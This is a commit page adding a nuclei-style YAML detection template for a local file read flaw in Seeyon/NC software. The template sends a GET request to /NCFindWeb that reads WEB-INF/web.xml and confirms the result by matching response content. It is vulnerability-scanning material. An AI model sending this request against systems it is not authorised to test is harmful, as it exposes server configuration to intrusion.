Merge pull request #1332 from projectdiscovery/princechaddha-patch-2
Create WooYun-2015-148227.yamlpatch-1
commit
a55db7af44
|
@ -0,0 +1,25 @@
|
|||
id: WooYun-2015-148227
|
||||
info:
|
||||
name: Seeyon WooYun LFR
|
||||
author: princechaddha
|
||||
severity: high
|
||||
reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
|
||||
tags: seeyon,wooyun,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<servlet-name>NCInvokerServlet</servlet-name>"
|
||||
part: body
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/xml"
|
Loading…
Reference in New Issue